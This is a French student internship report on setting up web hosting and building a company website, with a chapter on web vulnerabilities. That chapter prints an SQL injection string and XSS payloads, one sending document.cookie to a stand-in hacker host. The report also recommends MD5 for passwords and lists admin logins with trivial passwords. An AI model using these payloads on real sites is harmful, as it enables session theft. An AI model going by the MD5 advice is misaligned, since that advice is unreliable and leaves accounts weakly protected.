SlideShare une entreprise Scribd logo
Institut Supérieur des Études Technologiques
De Mahdia
Département Technologies de l’Informatique
Rapport de
Stage de Perfectionnement
Elaboré par :
Mohamed Amine Mahmoudi
Période du stage : 11/01/2016 à 07/02/2016
Société d’accueil : EL BOOTIC
©Année Universitaire 2015-2016©
Remerciements
Au terme de ce stage je tien a exprimer mes respects mais
connaissances et mes sincère remerciement au personnels du
EL BOOTIC, le directeur de la société AYED HATEM, qui
ont contribués à l’élaboration de ce rapport modeste.
Ainsi ceux qui mon aidées durant cette période pour effectuer
mon stage dans les meilleurs conditions, et je tiens également
à remercier virement tous ceux qui m’ont fait preuve d’un
grand esprit de collaboration et d’initiative tous les personnels
de l’équipe technique et qui m’apportent une aide précieuse
par leurs suggestion et leurs conseils.
Que tous ceux qui ont contribué de près ou de loin à la
réalisation de ce travail trouvent ici l’expression de nos
sincères gratitudes.
Sommaire
Table des matières
Introduction générale ...........................................................................................................................1
Chapitre 1 : Présentation du cadre du stage........................................................................................2
I. Introduction ....................................................................................................................2
II. Présentation de la société................................................................................................2
III. Contexte du stage ...........................................................................................................2
IV. Conclusion......................................................................................................................3
Chapitre 2 : Notions théoriques ............................................................................................................4
I. Introduction ....................................................................................................................4
II. Hébergement...................................................................................................................4
1. Définition .................................................................................................................4
2. Types........................................................................................................................4
3. Exemples des hébergeurs .........................................................................................5
III. Références web ..............................................................................................................5
1. Définition .................................................................................................................5
2. Types........................................................................................................................5
IV. Les Failles web ..............................................................................................................6
3. Définition .................................................................................................................6
4. Types des failles.......................................................................................................6
V. Outils de développement ................................................................................................7
1. PHP ..........................................................................................................................7
2. SQL ..........................................................................................................................7
3. Javascript et Jquery ..................................................................................................7
4. Bootstrap ..................................................................................................................7
VI. Conclusion......................................................................................................................7
Chapitre 3 : Spécification des besoins ..................................................................................................8
I. Introduction ....................................................................................................................8
II. Besoins fonctionnels.......................................................................................................8
III. Besoins non fonctionnels ...............................................................................................8
IV. Diagramme de cas d’utilisation ......................................................................................8
V. Conclusion......................................................................................................................9
Chapitre 4 : Conception.......................................................................................................................10
I. Introduction ..................................................................................................................10
II. Diagramme de séquence ..............................................................................................10
III. Diagramme de classe....................................................................................................11
IV. Conclusion....................................................................................................................12
Chapitre 5 : Tâches Effectuées............................................................................................................13
I. Introduction ..................................................................................................................13
II. Configuration de l’hébergement web ..........................................................................13
1. Réserver le nom du domaine..................................................................................13
2. FTP.........................................................................................................................14
3. Mail ........................................................................................................................14
4. Base des données....................................................................................................14
5. Autres Tâches.........................................................................................................14
III. Réalisation....................................................................................................................15
1. Partie principale .....................................................................................................15
2. Partie Administrateur .............................................................................................16
3. Partie Client............................................................................................................17
IV. Sécurité du site .............................................................................................................15
1. Faille Injection SQL...............................................................................................18
2. Faille XSS ..............................................................................................................18
3. Cryptage des données.............................................................................................19
V. Conclusion....................................................................................................................19
Conclusion générale .............................................................................................................................20
Bibliographie et Nétographie .............................................................................................................21
Annexe...................................................................................................................................................22
Liste des figures
Table des Figures
Figures 1 : diagramme de cas d’utilisation ................................................................................ 9
Figures 2 : diagramme de séquence ........................................................................................ 10
Figures 3 : diagramme de classe ............................................................................................. 11
Figures 4 : réservation nom du domaine ................................................................................. 13
Figures 5 : Envoyé les fichiers avec Filezilla .......................................................................... 14
Figures 6 : Base des données PhpMyAdmin ........................................................................... 15
Figures 7 : site web en partie principale .................................................................................. 16
Figures 8 : authentification des administrateurs ...................................................................... 16
Figures 9 : tableau de bord pour les administrateurs .............................................................. 17
Figures 10 : Panneau de contrôle pour les clients......................................................................... 17
Introduction générale
Stage de Perfectionnement Page 1
Introduction générale
Dans l’occasion de la période de stage j’examine comment crée une application
mobile exactement une version Android, tous les universités et les instituts supérieurs l’étude
pratique dans l’étude théorique à partir de stages qui ont la durée des études.
Le stage est un moyen qui permet à l’étudiant de s’intégrer dans la vie professionnelle en vue
d’avoir une idée générale sur le fonctionnement de l’entreprise. A ce niveau, l’objectif des
instituts supérieurs des études technologies est de permet à l’étudiant d’enrichir ses
connaissances et de s’adapter à l’environnement de l’entreprise.
En effet, mon stage d’ouvrir m’a permis l’occasion de s’intégrer au sien de la vie
professionnelle et d’élargir mes connaissances.
Finalement, l’objectif de ce stage est de faire une intervention pratique qui me permet
d’appliquer mes connaissances scientifiques et techniques relatives au domaine de
l’informatique, et de tester mes facultés d’analyse et de synthèse.
Chapitre 1 : Présentation du cadre du stage
Stage de Perfectionnement Page 2
Chapitre 1 : Présentation du cadre du stage
I. Introduction
Dans ce chapitre, nous allons présenter en premier lieu la société dans laquelle nous
avons effectué notre sujet de travail proposé tout en expliquant ses objectifs ainsi les
fonctionnalités nécessaires pour le réaliser.
II. Présentation de la société
EL BOOTIC est une société spécialisée dans le commerce et la maintenance du
matériel informatique, ainsi que dans le développement des logiciels et applications
informatiques. EL BOOTIC a été créée le 20 mai 2000 par hatem ayed sous forme de
société à responsabilité limitée (SARL). Grâce à la volonté qui anime l’équipe pour
fournir les meilleurs services aux clients et la qualité du matériel informatique, EL
BOOTIC a rapidement pris sa place sur le marché. Leurs activités sont diverses : vente
matériels et accessoires informatiques, maintenance et réparation matériels
informatiques et pièces électroniques, développement de logiciels, création des sites
WEB, assistance des entreprises.
Le stage s’est effectué en précisant sa vocation du développement un site web
moderne, efficace, et dans période exacte
Son adresse est Av hbib bourguiba Ksibet El Medyouni 5031
III. Contexte du stage
Dans l’objectif de maitriser et approfondir nos connaissances déjà acquises, la société
el bootic nous a accueillis dans ces locaux.
Elle nous a proposé comme sujet de suivre des formations sur les outils bureautiques
et approfondir les connaissances dans le développement mobile.
Les formations proposées par la société :
 Création un site web dynamique & hébergée
Chapitre 1 : Présentation du cadre du stage
Stage de Perfectionnement Page 3
Les formations consistent à connaitre les différentes fonctionnalités de ces outils, bien
maitrisés ces connaissances à l’aide des exemples et des travaux pratiques.
IV. Conclusion
A travers ce chapitre, nous avons présenté le cadre du projet, identifié à atteindre et le
travail à faire. Compte tenu de cela, nous proposant les détails du travail dans le
chapitre suivant.
Chapitre 2 : Notations théoriques
Stage de Perfectionnement Page 4
Chapitre 2 : Notions théoriques
I. Introduction
Avant de commencer le travail, nous présentons quelques notions théoriques
utilise dans mon stage.
Tout d'abord, nous identifions les mots importants, Cela m'a aidé à compléter le
travail requis et les mots techniques au cadre de stage.
II. Hébergement
1. Définition
Est une entité ayant pour vocation de mettre à disposition
des internautes des sites web conçus et gérés par des tiers.
Il donne ainsi accès à tous les internautes au contenu déposé dans leurs
comptes par les webmestres souvent via un logiciel FTP ou un gestionnaire de
fichiers. Pour cela, il maintient des ordinateurs allumés et connectés 24 heures
sur 24 à Internet (des serveurs web par exemple) par une connexion à très haut
débit (plusieurs centaines de Mb/s), sur lesquels sont installés des
logiciels : serveur HTTP (souvent Apache), serveur de messagerie, de base de
données...
2. Types
 Les hébergements partagés ou mutualisés : Chaque serveur héberge
plusieurs sites, jusqu'à plusieurs milliers, et ce dans le but de mutualiser
les coûts. Le principal avantage est le prix, le principal inconvénient est
que le client mutualisé n'est pas l'administrateur du serveur, il est donc
souvent tributaire du bon vouloir de l'hébergeur s'il souhaite une
technologie particulière.
 Les hébergements dédiés : Le client dispose alors de son propre
serveur, et peut en général l'administrer comme il le souhaite, ce qui est
le principal avantage de ce type d'offre. Le fournisseur du serveur reste
cependant propriétaire du serveur. Les inconvénients sont : le prix
Chapitre 2 : Notations théoriques
Stage de Perfectionnement Page 5
beaucoup plus élevé que les hébergements mutualisés, et le besoin de
compétences pour administrer la machine correctement.
 L'hébergement virtuel dédié via un hyperviseur qui offre au client la
souplesse d'un dédié (le client administre sa machine à sa convenance)
en lui fournissant une machine virtuelle qui utilise une partie des
ressources d'un serveur (physique) par des techniques de virtualisation
(informatique).
 Les hébergements dédiés dits « managés », avec « serveur dédié info
géré » ou « clés en main » : Le client dispose de son propre serveur
mais les techniciens de l'hébergeur s'occupent de sa gestion système.
Cette solution est parfaite si vous n'avez aucune connaissance
technique sur son administration. Il suffit simplement de déposer son
site. Ce type d'hébergement cherche à s'adapter aux besoins.
3. Exemples des hébergeurs
 OVH
 1and1
 Gandi
 One
 Ikola
 Lws
 Hostgator
 Etc…
III. Référencement web
1. Définition
C’est l’identifier le site dans les moteurs des recherches, c’est-à-dire
l’indexation les pages.
2. Types
 Le référencement naturel, il est directement en lien avec les contenus de
votre site. Votre positionnement est le révélateur de la bonne
compréhension de vos contenus par les moteurs de recherche.
 Le référencement manuel est la deuxième clef de votre succès sur
internet. Votre position sur Google dépend de votre popularité
Chapitre 2 : Notations théoriques
Stage de Perfectionnement Page 6
mesurée notamment par le nombre de liens de qualité qui pointent vers
votre site. D'où la nécessité du référencement manuel.
 Le référencement publicitaire, ce sont des liens mis en place depuis des
bannières publicitaires, les adwords, les animations, les jeux, les buzz.
 Le référencement de localisation (Google maps), il favorisera toutes les
requêtes effectuées sur des critères géographiques.
IV. Les failles web
1. Définition
Une faille c'est en fait une faiblesse dans un code qui peut être exploitée
pour détourner un site de sa fonction première. Le pirate va pouvoir
récupérer des données confidentielles (comme les infos personnelles des
inscrits) ou modifier le comportement du site. Mais heureusement pour
nous, il est possible de se protéger de ces fameuses failles.
2. Type des failles
 L’injection SQL : L'injection SQL est une méthode d'attaque très
fréquemment utilisée dans le monde du hack. Elle consiste à modifier
une requête SQL en injectant des morceaux de code non-filtrés,
généralement par le biais d'un formulaire.
 La faille include : à faille include est également très dangereuse.
Comme son nom l'indique, elle exploite une mauvaise utilisation de la
fonction include(). Cette fonction est très souvent utilisée pour
exécuter du code PHP se situant dans une autre page, et
particulièrement pour la connexion à une base de données.
 La faille upload : La faille upload est une des failles les plus
dangereuses. Vous connaissez sûrement la balise HTML qui permet
l'upload de fichier
 La faille XSS : (plus officiellement appelée Cross-Site Scripting) est
une faille permettant l'injection de code HTML ou JavaScript dans des
variables mal protégées.
 CSRF : Cross site request forgery
 CRLF : Carriage Return Line Feed
 Etc.
Chapitre 2 : Notations théoriques
Stage de Perfectionnement Page 7
V. Outils du développement
1. PHP
HyperText Preprocessor, plus connu sous son sigle PHP (acronyme récursif),
est un langage de programmation libre principalement utilisé pour produire
des pages Web dynamiques via un serveur HTTP, mais pouvant également
fonctionner comme n'importe quel langage interprété de façon locale. PHP est
un langage impératif orienté objet comme C++. PHP a permis de créer un
grand nombre de sites web célèbres, comme Facebook, YouTube,
Wikipedia, etc. Il est aujourd'hui considéré comme la base de la création des
sites Internet dits dynamiques.
2. SQL
Sigle de « Structured Query Language », en français langage de requête
structurée est un langage informatique normalisé servant à exploiter des bases
de données relationnelles. La partie langage de manipulation des données de
SQL permet de rechercher, d'ajouter, de modifier ou de supprimer des données
dans les bases de données relationnelles.
3. JavaScript et Jquery
JavaScript est un langage de programmation de scripts principalement employé
dans les pages web interactives mais aussi pour les serveurs.
4. Bootstrap
Bootstrap est un framework front-end (HTML5, CSS et JavaScript)
spécialement conçu pour le développement d'application web "responsive",
c'est-à-dire qui s’adapte automatiquement à différents dispositifs et tailles
d'écran (desktop, tablettes, smartphones, ...).
VI. Conclusion
Dans ce chapitre nous avons eu sur certains mots clés que j’ai utilisés dans le
stage et en cours de la création d’application. Quelle sont c'est tâches ?
Chapitre 3 : Spécification des besoins
Stage de Perfectionnement Page 8
Chapitre 3 : Spécification des besoins
I. Introduction
Pendant la période de mon stage j'ai fait des tâches, qui sont généralement de
création une application mobile de la société.
Pour cela je définirai les tâches, qu'on j'ai fait durant la période de stage.
II. Besoins fonctionnels
Avant la création de l’application il faut définir quelques besoins fonctionnels sont
généralement
 Partie pour les administrateurs
 Partie pour les clients
 Sécurité
 Vend en ligne
 Synthèse statistique
III. Besoins non fonctionnels
Les besoins non fonctionnels décrivent toutes les contraintes auxquelles est soumis
le système pour sa réalisation et son bon fonctionnement.
 Ergonomie et souplesse
 Rapidité
 Efficacité
IV. Diagramme de cas d’utilisation
Chapitre 3 : Spécification des besoins
Stage de Perfectionnement Page 9
Figure 1 : diagramme de cas d’utilisation
V. Conclusion
Dans ce chapitre on a présenté une étude du système existant, les lacunes qu’il
comprend ainsi que les solutions que nous proposons pour pallier ces problèmes,
nous avons aussi cité les besoins fonctionnels et non fonctionnels qui sont
indispensables pour mieux faciliter le travail à réaliser.
Dans le chapitre suivant nous allons aborder l’étude conceptuelle de notre site, tout
en mentionnant tous les scénarios possibles, les acteurs, les diagrammes.
Chapitre 4 : Conception
Stage de Perfectionnement Page 10
Chapitre 4 : Conception
I. Introduction
Ce chapitre a pour objectif de présenter la solution conceptuelle proposée. En
d’autres termes, ce chapitre devrait répondre à la question comment faire.
La conception est décrite par un ensemble de diagrammes relevant soit du langage
de modélisation UML.
II. Diagramme de séquence
Figure 2 : Diagramme de séquence
Chapitre 4 : Conception
Stage de Perfectionnement Page 11
III. Diagramme de classe
Figure 3 : Diagramme de classe
Chapitre 4 : Conception
Stage de Perfectionnement Page 12
IV. Conclusion
En clair, comme nous venons de le voir, ce chapitre était consacré, à la conception
des diagrammes, de séquence qui nous ont permis de dégager l'architecture
générale de notre application représentée ici par ce diagramme de classe qui nous
renseigne sur la relation homme Machine de notre application qui sera détaillée
dans le prochain chapitre.
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 13
Chapitre 5 : Tâches Effectuées
I. Introduction
Après avoir placé notre projet dans son cadre général, une étape indispensable
serait de présenter l’environnement sur lequel se base l’application. Dans ce
chapitre, nous allons présenter les outils bureautiques tels que les notions des
hébergements web étudié pour améliorer, élargir et bien maitriser nos
connaissances.
II. Configures de l’Hébergement Web
1. Réserver nom du domaine
Dans cadre de stage en va réserver un nom du domaine, tout d’abord je
recherche un nom existe, c’est-à-dire le nom n’est pas réserver
Exemple.com … Réserver
Devarabe.com …n’est pas réservé donc j’acheté.
Je utilisé www.whois.com
Figure 4 : réservation nom du domaine
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 14
2. FTP
Après le commander l’hébergement, je crée des comptes FTP (File
Transfer Protocol). Ce service permet d’envoi les grands fichiers au serveur
du site facilement, par suite je envoyé les fichiers en utilise logiciel
Filezilla
Figure 5 : Envoyé les fichiers avec Filezilla
3. Mail
L’hébergeur offre des nombres des comptés mail et une interface pour
contrôle les emails. Il existe plusieurs applications web pour les emails,
mais généralement en utilisent
 Roundcube
 Horde
 SquirrelMail
4. Base des données
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 15
Pour chaque hébergeur ou par un offre d’hébergement, l’hébergeur
donnée un nombre des basées des données (1, 2, 3 ou illimité).
J’obtenue 5 basés qui travaille avec phpmyadmin en utilise langage
SQL, tout d’abord création du tables et liée entre eux.
Lorsque j’installe WordPress les tables créent automatiquement au sien
de l’interruption du script d’installation WordPress.
Figure 6 : base des données PhpMyAdmin
5. Autre Tâches
Au cours de configurations de l’hébergement, je modifie le mot de
passe de contrôle panel qui je réservoir à partir de l’hébergement, je
respect des normes lorsque en crée le mot de passe comme l’utilisation
des caractères minuscule & majuscule, des chiffres et des symboles.
Ainsi que je crée les sous domaine c’est-à-dire une racine de site
comme suit SOUS_DOMAINE.NOM_SITE.COM.
Puis je modifier les paramètres du DNS pour le pointage sur domaine,
autrement l’hébergeur fait lé automatiquement.
III. Réalisation
1. Partie Principale
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 16
C’est la partie accessible par tous les visiteurs du site web, qui en trouvent
les informations de la société.
Figure 7 : site web en partie principale
2. Partie Administrateur
Figure 8 : authentification des administrateurs
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 17
Figure 9 : tableau de bord pour les administrateurs
3. Partie Client
Figure 10 : Panneau de contrôle pour les clients
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 18
IV. Sécuriste du site
1. Faille Injection SQL
Cette faille apparaît quand il est possible d'injecter du code SQL dans les
requêtes SQL qui sont faites dans une page web. C'est actuellement la
"meilleure" vulnérabilité Web en rapport fréquence/surface d'exploitation.
Les conséquences d'une faille SQL peuvent être multiples, du
contournement de formulaires d'authentification au dump complet de la base
de données en passant par l'exécution arbitraire de code. Dans ce premier
article, nous allons essayer de nous familiariser avec des injections simples
(appelées aussi injections du premier ordre).
Exemple : ‘ OR 1=1 OR ‘’=’
Premièrement, le plus important, filtrer les variables dans les formulaires.
Moi personnellement j'utilise une fonction PHP qui me permet de savoir s'il
y a un espace ou tous autres caractères spéciaux non désirés. Il est aussi
important de préciser que si vous protéger votre formulaire par une fonction
JavaScript un pirate va recopier votre formulaire et exploiter en local rien de
plus facile, alors à ne pas faire.
2. Faille XSS
Il existe en fait deux type de XSS :
 Le XSS réfléchi (non permanent)
 Le XSS stocké (permanent)
Exemple : <SCRIPT>ALERT('IL Y A UNE FAILLE XSS')</SCRIPT>
Exemple : <IMG SRC="AZERTY.JPG"
ONERROR="WINDOW.LOCATION='HTTP://WWW.SITE_DU_HACKER.COM/RECUPERATION_COOKI
E.PHP?COOKIE='+DOCUMENT.COOKIE;">
La solution la plus adaptée contre cette faille est d'utiliser la fonction
HTMLSPECIALCHARS(). Cette fonction permet de filtrer les symboles du type <, &
ou encore ", en les remplaçant par leur équivalent en HTML. Par exemple :
 Le symbole & devient &amp;
 Le symbole " devient &quot;
 Le symbole ' devient &#39;
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 19
$PSEUDO = HTMLSPECIALCHARS ($_POST ['PSEUDO']);
3. Cryptage des données
Dans la base des données l’insertion des données et sur tout la colonne de
mot de passe sera crypte avec la fonction MD5() pour assurer bien la
sécurité des comptes des administrateurs et leurs clients
V. Conclusion
Dans le chapitre réalisation nous avons appelé à présenter les interfaces réalisé
dans notre site web pour clarifier les étapes d’utilisation de notre site avec ses
deux parties statique et dynamique.
Conclusion générale
Page 20
Conclusion générale
Ce travail a été réalisé dans le cadre de notre stage de perfectionnement de un mois au sein de
Institué Supérieur des Etudes Technologique de Mahdia Durant notre stage nous a été
bénéfique bien sur le plan théorique que pratique.
Ce stage été une bonne occasion pour élargir mes connaissances pratiques pour s’adapter aux
nouvelles technologies qui s’améliorent jour pour persister dans un secteur qui s’éveille chaque jour
sur des nouvelles innovations.
Le projet m’a également donnée l’occasion de mieux de la société de service informatique, leur
fonctionnement en interne et vis-à-vis des clients, c’est un milieu qu’il est utile d’appréhender pour
débuter sa carrière en tant que développeur.
En guise de perspective, une formation techniques d’hébergement sera très intéressent pour suivre les
améliorations technologiques, des connaissances en accès seront bien complémentaire à mes
connaissances.
Pour voir le site : www.lelkol.net/StageDePerfectionnement/
Administrateur : www.lelkol.net/StageDePerfectionnement/admin/ Login : med pass : 123456
Client: www.lelkol.net/StageDePerfectionnement/client/ Login : med pass : azerty
Bibliographie et Nétographie
Stage de Perfectionnement Page 21
Bibliographie et Nétographie
[1] Sylvain Baudoin. « Télécharger Comment Héberger Son Site Web Chez Soi », Paris, 2008, 200p
[2] Damien Nouvel. « Création de site web Hébergement de site web », Paris, 2005, 53p
[3] Christophe AUBRY. « WordPress 4Un CMS pour créer et gérer blogs et sites Web »,473p
[4] Patrick Zemour. « Le guide pratique WordPress Créez et animez vos blogs et sites web »,
2012,154p
[5] http://guides.ovh.com/ : guide d’utilisation l’hébergeur OVH
[6] http://getbootstrap.com/: base des connaissances sur Bootstrap
[7] http://www.w3schools.com/bootstrap/: Exemple en ligne en utilisent Bootstrap
[8] https://openclassrooms.com/courses/protegez-vous-efficacement-contre-les-failles-web: Tutorial
sur les failles web.
[9] http://fr.wikipedia.org/wiki/Hébergeur_web : Hébergeur web
[10] http://fr.wikipedia.org/wiki/CPanel : Cpanel
[11] http://www.networking4all.com/fr/support/certificats+ssl/manuels/cpanel/ : Cpanel
[12] http://fr.wikipedia.org/wiki/Hébergement_mutualisé : hébergement mutualisé
[13] http://openclassrooms.com/courses/ameliorez-la-visibilite-de-votre-site-grace-au-
referencement : Améliorez la visibilité de votre site grâce au référencement
[14] http://www.w3c2i.com/faqs/differents-types-de-referencement.html : DIFFÉRENTS TYPES DE
RÉFÉRENCEMENT
[15] http://www.bases-hacking.org/failles-web.html : Les failles web
ANNEXE
Stage de Perfectionnement Page 22
Liste des annexes :
Annexe 1 : Facture d’hébergement
Annexe 2 : Création Base des données sur serveur
Annexe 3 : Structure de base des données
Annexe 1 : Facture d’hébergement
Annexe 2 : Création Base des données sur Serveur
Annexe 3 : Structure de la Base des données

Contenu connexe

Tendances

Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2
Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2
Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2
Sofien Benrhouma
 
Rapport PFE : Développement D'une application de gestion des cartes de fidéli...
Rapport PFE : Développement D'une application de gestion des cartes de fidéli...Rapport PFE : Développement D'une application de gestion des cartes de fidéli...
Rapport PFE : Développement D'une application de gestion des cartes de fidéli...
Riadh K.
 
Pfe conception et développement d'une application web GMAO JEE
Pfe conception et développement d'une application web GMAO JEEPfe conception et développement d'une application web GMAO JEE
Pfe conception et développement d'une application web GMAO JEE
Oussama Djerba
 

Tendances (20)

Rapport pfe Conceptionet Developpement d'une Application web et Mobile
Rapport pfe Conceptionet Developpement d'une Application web et  Mobile Rapport pfe Conceptionet Developpement d'une Application web et  Mobile
Rapport pfe Conceptionet Developpement d'une Application web et Mobile
 
Projet de fin étude ( LFIG : Conception et Développement d'une application W...
Projet de fin étude  ( LFIG : Conception et Développement d'une application W...Projet de fin étude  ( LFIG : Conception et Développement d'une application W...
Projet de fin étude ( LFIG : Conception et Développement d'une application W...
 
Rapport (Mémoire de Master) de stage PFE pour l’obtention du Diplôme Nationa...
Rapport (Mémoire de Master) de stage PFE pour  l’obtention du Diplôme Nationa...Rapport (Mémoire de Master) de stage PFE pour  l’obtention du Diplôme Nationa...
Rapport (Mémoire de Master) de stage PFE pour l’obtention du Diplôme Nationa...
 
Rapport pfe licence
Rapport pfe licenceRapport pfe licence
Rapport pfe licence
 
Rapport Projet de Fin d'Etudes
Rapport Projet de Fin d'EtudesRapport Projet de Fin d'Etudes
Rapport Projet de Fin d'Etudes
 
Rapport- Conception et réalisation d'une plateforme social learning
Rapport- Conception et réalisation d'une plateforme social learningRapport- Conception et réalisation d'une plateforme social learning
Rapport- Conception et réalisation d'une plateforme social learning
 
Rapport de stage développement informatique
Rapport de stage développement informatique Rapport de stage développement informatique
Rapport de stage développement informatique
 
Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2
Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2
Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2
 
Rapport De PFE
Rapport De PFERapport De PFE
Rapport De PFE
 
Rapport PFE faten_chalbi
Rapport PFE faten_chalbiRapport PFE faten_chalbi
Rapport PFE faten_chalbi
 
Présentation PFE
Présentation PFEPrésentation PFE
Présentation PFE
 
Rapport de projet de fin d'étude licence informatique et multimédia
Rapport de projet de fin d'étude licence informatique et multimédiaRapport de projet de fin d'étude licence informatique et multimédia
Rapport de projet de fin d'étude licence informatique et multimédia
 
Rapport pfe
Rapport pfeRapport pfe
Rapport pfe
 
Rapport PFE : Développement D'une application de gestion des cartes de fidéli...
Rapport PFE : Développement D'une application de gestion des cartes de fidéli...Rapport PFE : Développement D'une application de gestion des cartes de fidéli...
Rapport PFE : Développement D'une application de gestion des cartes de fidéli...
 
Rapport de stage de fin d'études ISI 2015
Rapport de stage de fin d'études ISI 2015Rapport de stage de fin d'études ISI 2015
Rapport de stage de fin d'études ISI 2015
 
Application web de gestion de recrutement- Recruitement managment system
Application web de gestion de recrutement- Recruitement managment systemApplication web de gestion de recrutement- Recruitement managment system
Application web de gestion de recrutement- Recruitement managment system
 
Rapport Pfe Application Web e-commerce Symfony2
Rapport Pfe Application Web e-commerce Symfony2Rapport Pfe Application Web e-commerce Symfony2
Rapport Pfe Application Web e-commerce Symfony2
 
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
 
Pfe conception et développement d'une application web GMAO JEE
Pfe conception et développement d'une application web GMAO JEEPfe conception et développement d'une application web GMAO JEE
Pfe conception et développement d'une application web GMAO JEE
 
Conception et developpement d'une application mobile Android e-location
Conception et developpement d'une application mobile Android e-locationConception et developpement d'une application mobile Android e-location
Conception et developpement d'une application mobile Android e-location
 

Similaire à Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Rapport_deStage
Rapport_deStageRapport_deStage
Rapport_deStage
Omar TRAI
 

Similaire à Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine (20)

Rapport Stage Ouvrier - Application J2EE - Haroun SMIDA
Rapport Stage Ouvrier - Application J2EE - Haroun SMIDARapport Stage Ouvrier - Application J2EE - Haroun SMIDA
Rapport Stage Ouvrier - Application J2EE - Haroun SMIDA
 
Republique_Tunisienne_Ministere_de_lEnse.pdf
Republique_Tunisienne_Ministere_de_lEnse.pdfRepublique_Tunisienne_Ministere_de_lEnse.pdf
Republique_Tunisienne_Ministere_de_lEnse.pdf
 
Rapport-de-perfectionnement-Jasser-Degani.pdf
Rapport-de-perfectionnement-Jasser-Degani.pdfRapport-de-perfectionnement-Jasser-Degani.pdf
Rapport-de-perfectionnement-Jasser-Degani.pdf
 
Conception et développement d’un système d’alerte et notification d’une tou...
Conception et développement  d’un système d’alerte et notification  d’une tou...Conception et développement  d’un système d’alerte et notification  d’une tou...
Conception et développement d’un système d’alerte et notification d’une tou...
 
Rapport de stage PFE ( DUT) chez Synthèse Conseil - Jaiti Mohammed
Rapport de stage PFE ( DUT) chez Synthèse Conseil  - Jaiti MohammedRapport de stage PFE ( DUT) chez Synthèse Conseil  - Jaiti Mohammed
Rapport de stage PFE ( DUT) chez Synthèse Conseil - Jaiti Mohammed
 
GEmploi : Smart school timetable management software using RFID technology
GEmploi : Smart school timetable management software using RFID technologyGEmploi : Smart school timetable management software using RFID technology
GEmploi : Smart school timetable management software using RFID technology
 
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
 
Rapport de Projet de Fin d'étude .
Rapport de Projet de Fin d'étude .Rapport de Projet de Fin d'étude .
Rapport de Projet de Fin d'étude .
 
Rapport finiale
Rapport finialeRapport finiale
Rapport finiale
 
Rapport de stage d'été
Rapport de stage d'étéRapport de stage d'été
Rapport de stage d'été
 
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
 
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
 
application mobile de gestion de panne de BTS
application mobile de gestion de panne de BTSapplication mobile de gestion de panne de BTS
application mobile de gestion de panne de BTS
 
Mémoire : Cloud iaas Slim Hannachi
Mémoire :  Cloud iaas Slim HannachiMémoire :  Cloud iaas Slim Hannachi
Mémoire : Cloud iaas Slim Hannachi
 
Briqueterie saoui
Briqueterie saouiBriqueterie saoui
Briqueterie saoui
 
Rapport de projet de fin d’étude
Rapport  de projet de fin d’étudeRapport  de projet de fin d’étude
Rapport de projet de fin d’étude
 
Gestion des Chercheurs d’Emploi
Gestion des Chercheurs d’EmploiGestion des Chercheurs d’Emploi
Gestion des Chercheurs d’Emploi
 
Étude et mise en place d'un serveur messengerie
Étude et mise en place d'un serveur messengerie Étude et mise en place d'un serveur messengerie
Étude et mise en place d'un serveur messengerie
 
Rapport_deStage
Rapport_deStageRapport_deStage
Rapport_deStage
 
Rapport PFE réalisation d’un Framework Kinect
Rapport PFE réalisation d’un Framework KinectRapport PFE réalisation d’un Framework Kinect
Rapport PFE réalisation d’un Framework Kinect
 

Dernier

1-IMP-Tuto-Recherche simple avancée-V4-20240425-BS.pptx
1-IMP-Tuto-Recherche simple avancée-V4-20240425-BS.pptx1-IMP-Tuto-Recherche simple avancée-V4-20240425-BS.pptx
1-IMP-Tuto-Recherche simple avancée-V4-20240425-BS.pptx
schneiderbeatrice78
 
Cours mécanique des fluides de l’ingénieur
Cours mécanique des fluides de l’ingénieurCours mécanique des fluides de l’ingénieur
Cours mécanique des fluides de l’ingénieur
NdeyeAminataDond
 
support de formation Consignation et déconsignation des energies et produits...
support de formation  Consignation et déconsignation des energies et produits...support de formation  Consignation et déconsignation des energies et produits...
support de formation Consignation et déconsignation des energies et produits...
ABDELHADI ENNAIR
 

Dernier (13)

Sainte Jeanne d'Arc, patronne de la France 1412-1431.pptx
Sainte Jeanne d'Arc, patronne de la France 1412-1431.pptxSainte Jeanne d'Arc, patronne de la France 1412-1431.pptx
Sainte Jeanne d'Arc, patronne de la France 1412-1431.pptx
 
Guide d'utilisation Microsoft PowerPoint 2016
Guide d'utilisation Microsoft PowerPoint 2016Guide d'utilisation Microsoft PowerPoint 2016
Guide d'utilisation Microsoft PowerPoint 2016
 
Formation M2i - Prise de parole face caméra : performer en distanciel
Formation M2i - Prise de parole face caméra : performer en distancielFormation M2i - Prise de parole face caméra : performer en distanciel
Formation M2i - Prise de parole face caméra : performer en distanciel
 
Cahier-de-Charges-Communication-Digitale-1-1.pdf
